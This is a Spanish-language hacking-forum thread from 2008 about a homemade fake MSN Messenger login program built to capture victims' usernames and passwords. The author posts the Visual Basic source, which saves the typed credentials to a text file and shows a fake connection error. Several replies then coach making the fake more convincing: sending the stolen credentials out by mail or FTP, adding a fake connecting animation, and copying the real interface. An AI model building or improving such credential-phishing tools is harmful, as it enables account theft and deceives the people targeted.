Test Foro de elhacker.net SMF 2.1

Hola chicos.

Bien, veréis, resulta que por fin he acabado de crear mi fake de msn (tenia ganas de hacerme uno, aunque evidentemente no lo voy a usar, pero por el simple hecho de programarlo) y pues ya lo he hecho, y lo he publicado en éste foro, en la sección de Software, les dejo el enlace por si le quieren echar un vistazo...

http://foro.elhacker.net/software/chorizator_20_by_invisiblehack-t239174.0.html;msg1144251#msg1144251

Bien, como véis, es un programa muy sencillo, lo único que hace es simular ser el Msn Live, con la misma interfaz y todo, y pues cuando el usuario mete su user y su clave y le da al botón de iniciar sesión, al usuario le salta un error, y su clave y usuario queda almacenada en un fichero de texto dentro del disco duro de la propia victima, no hace más que eso...

Pues bien, varios users han probado el programa, y varios de ellos que tenian en sus Pc`s instalados el KIS como antivirus, me dijeron que se lo detectaba como virus/gusano, y que se lo eliminaba al instante...

Yo tengo Panda 2009 (actualizado, claro) y no me ha saltado nada...

Entonces era por si me podríais decir el motivo de por qué salta el KIS ante mi programa, porque no me lo explico, ya digo que el programa no modificada nada, ni crea entradas en el registro, ni borra archivos....ni nada que se pueda considerar dañino o peligroso...

Un saludo, gracias  ;D

antes de responderte bien ¿ viene con source ?

¿solo tiene de código el de almacenar los datos?

problablemente el codigo que de alarma es cuando el programa se copia a system y se agrega al registro; en ese momento es un suceso clave para el kis/kav para pillar malware.
Si no seria que habrias copiado codigo de otra aplicacion ya detectada como gusano... entonces por eso lo detectaria a pesar de que hayas agregado mas cosas sin cambiar la parte donde anda la firma.

a ver...¿no era que no creaba entradas en el registro?, a mi me alto el antivirus y sin ver el source en estas cosas no le creo ni al mas amigo...algo tiene.. :¬¬ sino no salta por eso...

Os aseguro que mi aplicación está totalmente limpia (los que me conoceis sabeis de sobra que llevo el suficiente tiempo metido aqui y en el mundo del hacking como para andar intentando colar troyanos en foros¬¬) y pues como ya dije, el único codigo que tiene la aplicación es en el botón de iniciar sesión, que es el que se encarga de capturar los datos que se meten en los textbox y crear el archivo en C:/

¿Puede ser que el KIS tenga una heuristica tan alta que detecte como acción peligrosa el hecho de que un programa cree por si mismo un archivo de texto?

Podrías poner el código? Es extraño por decirlo menos sí sólo hace lo que dices no habrá problema en poner el código

Postea el source, si copiaste alguna parte del codigo es lo mas probable que sea detectada ya que esos fakes msn son mas viejos que el mundo.

que fake mas pobre... al menos ponle que se envie via mail o ftp... ;D ;D ;D

y aun asi no seria detectado por ningun av, pero de seguro ese tiene mas cosas que no mencionaste... y claro no pones el codigo, algo me dice que es u fake pero para los user que lo bajen  :laugh: :laugh: :laugh: :laugh:

1º- Llevo el suficiente tiempo en el hacking y por este foro como para que todos sepais que yo ya estoy mayorcito para andar con pijadas de esas de subir troyanos y porquerias a los foros, yo no soy de esos, y los que me conoceis de hace tiempo lo sabéis bien...

2º- No tengo ningún problema en mostrar el código, aquí lo tenéis...

Citar
Private Sub Command1_Click()
Open "c:\recompensa.txt" For Append As #1
Print #1, Text1
Print #1, Text2
Close #1
MsgBox "Error conectando con el servicio", vbCritical, "Error de conexión"
End Sub

Eso va dentro del botón de Iniciar sesión (es decir, el unico boton que tiene el fake) y como véis, lo unico que hace es crear el archivo recompensa.txt en C;/ y abrirlo, y posteriormente meter dentro de ese archivo lo que la víctima haya escrito en los textbox 1 y 2 (user y pass respectivamente) y por último, para que la víctima no sospeche tanto, le salta un mensaje de error...

No tiene más código la aplicación...

me inmaginaba esto, el tema es como sabemos si ese es el codigo realmente que lleva...no es por desconfiar, pero como dije, no confio ni en mi sombra en estas cosas...que por algo saltan los antivirus...tengo un programita para ver que tiene dentro , mañana me saco la duda  :P y si veo algo raro lo posteo...

saludos.

como se llama ese programa? Seba123neo  me interesa xD

P.D.: es un decompilador(algo asi se les llama) ¬¬¡?

Cita de: ░▒▓BlackZeroҖ▓▒░ en 22 Diciembre 2008, 03:15 AM
como se llama ese programa? Seba123neo  me interesa xD

P.D.: es un decompilador(algo asi se les llama) ¬¬¡?

Si, no es algo que tenga mucha ciencia :P

Si la cosa es asi, es bastante raro que salte el av

Salu2

Yo lo revisé y no hace nada raro, no crea archivo, ni ejecuta proceso extraño, el Avast también lo detecta, pero como he dicho, no tiene nada raro así que no se que es lo que detectan los AV  :rolleyes:

Cita de: seba123neo en 22 Diciembre 2008, 03:12 AM
me inmaginaba esto, el tema es como sabemos si ese es el codigo realmente que lleva...no es por desconfiar, pero como dije, no confio ni en mi sombra en estas cosas...que por algo saltan los antivirus...tengo un programita para ver que tiene dentro , mañana me saco la duda  :P y si veo algo raro lo posteo...

saludos.

se llama SebasCodeGeter ò SebasDebug ò SebasSandboxie ò SebasDecompiler ò SebasGetData!! :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes:

ummmm lo baje .. lo revise ... lo abri... lo decompile  ;D... y no tiene nada mas de lo que mencionas... esas lineas de codigo ... pero bueno todos dudarian de un ejecutable y mas si esta grandesito mas de 50 kb para esas lineas simples ... logico es por la imagen de fondo ...

para mi gusto esta muy pobre como dije... pero la idea es esa de guardar los datos en un texto ... si le pusieras la opcion que se envie por mail estaria mejor ...
es solo una sugerencia  ;D...

y sobre lo que mencionan que algunos av lo detectan como amenaza ... que jodido ... asi estos av pierden credibilidad ... tomaran cuakier exe inofensivo como una amenaza.

@offtopic: KIS? que antivirus es ese?

Cita de: yofoxD en 22 Diciembre 2008, 05:14 AM
@offtopic: KIS? que antivirus es ese?

KIS = Kaspersky Internet Security  :xD
Es la suite completa de Kaspersky, está el KAV, antivirus y ya, y está el KIS, suite con AV, firewall, anti-malware, etc

Saludos

Citar
ummmm lo baje .. lo revise ... lo abri... lo decompile  ;D... y no tiene nada mas de lo que mencionas... esas lineas de codigo ...

Bueno, por lo menos yo ya me quedo tranquilo, ya has visto que no miento, y que mi intención está muy lejos de intentar troyanizar al foro  :xD

Ya de paso, en la madrugada de ayer en 10 minutitos hice éste pequeño video explicativo (a modo de tutorial) sobre el programa, para que veais que no lleva nada extraño entre líneas...

[youtube=425,350]http://www.youtube.com/watch?v=aAH5pOp9uwg[/youtube]

Saludos  :D

se ve feito y bien falso... pero bueno, para eso se aprende a mejorarlo.

si bueno no era para hacer tanto espamento, con algunos decompiladores podes saber todo lo que hace...por lo menos mi windows live no es asi, es el 8.5 pero no tiene esa interfaz por lo menos el boton mejorale que es lo que mas te delata...yo no caigo ni despues de tomar 50 porrones(pero no tomo asi que no voy a caer nunca  :xD)...

saludos.

Es que el fake no es del 8.5, sino de la nueva versión, la 2009, aqui te dejo la descarga de Softonic para que veas algunas capturas...

http://windows-live-messenger-2009.softonic.com/

Saludos  ;D

Un detalle el menú se lo podrías fabricar no es difícil :)

Todavía estoy haciendo click en herramientas y nada, otra cosa al error dale un tiempo para que parezca que por lo menos trata de conectar, de ahí en más el botón está muy fake es cierto xD

Exacto, el error al conectar, deberías de mostrar una animación como si intentara conectar, y luego ... ERROR  :rolleyes: , así no da tiempo a nada  :-X

mira yo hace unos años hice uno llamado Copy msn; ya no anda por la red, fue para el msn 7.5; no habia forma de detectar a simple vista si era verdadero o falso; ya que todo era 100% igual en apariencia, si una persona iniciaba sesion aparecia el muñeqioto dando vuelta como el original... la persona se daba cuenta cuando el programa daba el error, se cerraba y tardaba algo en abrirse el original...
pero cuando la password ya habia sido atrapada...
tambien los controles se ajustaban a la pantalla cuando se maximizaba y se reducia la pantalla del msn... :O

ahora el consejo es usa imagenes en ves de botones, y para ello usa los eventos para pasar el mouse, y al presionar, y al soltar... de este modo podras reproducir identicamente los botones del msn.

saludos!

Citar
Exacto, el error al conectar, deberías de mostrar una animación como si intentara conectar, y luego ... ERROR

Tienes razón, y eso creo que no sería muy dificil añadirselo, por ejemplo con una ProgressBar, grax por la sugerencia  ;D

Citar
Un detalle el menú se lo podrías fabricar no es difícil

Cierto, me lo anoto para la próxima ^^

Citar
si una persona iniciaba sesion aparecia el muñeqioto dando vuelta como el original

Eso si que ya lo habia estado pensando para añadirselo a ésta versión, pero el caso es que no encontré el modo de hacer que un icono diese vueltas...si me pudieseis alguien facilitar alguna forma de hacerlo, os estaria muy agradecido ^^

Saludos =D